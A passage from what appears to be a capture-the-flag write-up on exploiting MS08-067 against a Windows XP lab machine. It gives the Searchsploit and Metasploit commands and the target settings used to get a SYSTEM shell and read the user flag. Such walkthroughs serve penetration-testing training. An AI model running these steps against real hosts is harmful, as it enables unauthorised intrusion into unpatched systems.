https://substackcdn.com/image/fetch/$s_!W-qa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 848w, https://substackcdn.com/image/fetch/$s_!W-qa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 1272w, https://substackcdn.com/image/fetch/$s_!W-qa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F40320c3b-92de-40dc-b99e-4679f598403f_800x135.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Methodology</h3><blockquote><p><em>Updated port scan and enumeration information:<br>139/tcp: Microsoft Windows netbios-ssn<br>445/tcp: Microsoft Windows XP microsoft-ds<br>3389/tcp: ms-wbt-server (conn-refused)</em></p></blockquote><p>Now that we see MS08&#8211;67 in Searchsploit, let&#8217;s try this. <em>cp /usr/share/exploitdb/exploits/windows/remote/40279.py ./ t</em>hen execute it via <em>python 40279.py</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Bihd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Bihd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 424w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 848w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 1272w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Bihd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/44749e41-609b-484a-8517-bedebd3091d7_800x200.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Bihd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 424w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 848w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 1272w, https://substackcdn.com/image/fetch/$s_!Bihd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F44749e41-609b-484a-8517-bedebd3091d7_800x200.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Now we target our host with <em>python 40279.py 10.10.10.4 1</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!isPt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!isPt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 424w, https://substackcdn.com/image/fetch/$s_!isPt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 848w, https://substackcdn.com/image/fetch/$s_!isPt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 1272w, https://substackcdn.com/image/fetch/$s_!isPt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!isPt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!isPt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 424w, https://substackcdn.com/image/fetch/$s_!isPt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 848w, https://substackcdn.com/image/fetch/$s_!isPt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 1272w, https://substackcdn.com/image/fetch/$s_!isPt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F53f46ca4-d6ca-4ee1-84ac-dd099d403bf5_800x169.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nothing seems to have happened. Let&#8217;s try <em>msfconsole</em>. We&#8217;ll execute <em>search 08&#8211;067</em> to find modules for this then select (<em>use 0</em>) to enter our targeting information.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zxVM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zxVM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 424w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 848w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 1272w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zxVM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zxVM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 424w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 848w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 1272w, https://substackcdn.com/image/fetch/$s_!zxVM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff7c0bbaf-432b-4229-a490-04b9aa70c2b6_800x579.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Set the host (<em>set rhost 10.10.10.4</em>) and let&#8217;s run this.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Pk0r!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Pk0r!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 424w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 848w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 1272w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Pk0r!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Pk0r!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 424w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 848w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 1272w, https://substackcdn.com/image/fetch/$s_!Pk0r!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F99bde12e-2c6d-45a9-bf1f-dfba7e88c66e_800x462.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Oops. Let&#8217;s <em>set target 6</em> for XP SP3 English.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!e7jW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!e7jW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 424w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 848w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 1272w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!e7jW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f93fa043-9d74-4465-bb77-3551a7752a52_800x221.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!e7jW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 424w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 848w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 1272w, https://substackcdn.com/image/fetch/$s_!e7jW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff93fa043-9d74-4465-bb77-3551a7752a52_800x221.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We have SYSTEM, which is root/administrator level. Let&#8217;s get the user flag first.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FzAX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FzAX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 424w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 848w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 1272w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FzAX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FzAX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 424w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 848w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 1272w, https://substackcdn.com/image/fetch/$s_!FzAX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F671093fc-a2a1-42b9-8acb-db1e1cfd6a2a_800x499.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>There it is! Now, let&#8217;s move to Administrator.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QlQw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QlQw!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 424w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 848w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 1272w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QlQw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/14e46259-d762-4640-b180-f0b58bcedaac_800x280.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 